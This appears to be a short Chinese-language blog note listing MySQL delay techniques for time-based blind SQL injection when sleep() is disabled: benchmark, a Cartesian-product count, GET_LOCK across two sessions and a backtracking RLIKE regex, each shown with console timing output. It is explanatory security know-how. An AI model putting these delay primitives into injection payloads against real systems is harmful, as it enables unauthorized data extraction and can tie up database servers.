在mysql盲注禁用sleep场景下,可以使用以下方法进行盲注:
sleep函数
1
2
3
4
5
6
7mysql> select sleep(2);
+----------+
| sleep(2) |
+----------+
| 0 |
+----------+
1 row in set (2.00 sec)benchmark函数
1
2
3
4
5
6
7mysql> select benchmark(20000000,1/2);
+-------------------------+
| benchmark(20000000,1/2) |
+-------------------------+
| 0 |
+-------------------------+
1 row in set (2.33 sec)笛卡尔积
1
2
3
4
5
6
7mysql> SELECT count(*) FROM information_schema.tables a,information_schema.tables b,information_schema.tables c;
+----------+
| count(*) |
+----------+
| 33386248 |
+----------+
1 row in set (1.74 sec)GET_LOCK
SESSION A
1
2
3
4
5
6
7mysql> select get_lock('test',1);
+--------------------+
| get_lock('test',1) |
+--------------------+
| 1 |
+--------------------+
1 row in set (0.00 sec)SESSION B
1
2
3
4
5
6
7mysql> select get_lock('test',2);
+--------------------+
| get_lock('test',2) |
+--------------------+
| 0 |
+--------------------+
1 row in set (2.00 sec)RLIKE
1
2
3
4
5
6
7mysql> select rpad('a',2000000,'a') RLIKE concat(repeat('(a.*)+',30),'b');
+-------------------------------------------------------------+
| rpad('a',2000000,'a') RLIKE concat(repeat('(a.*)+',30),'b') |
+-------------------------------------------------------------+
| 0 |
+-------------------------------------------------------------+
1 row in set (2.41 sec)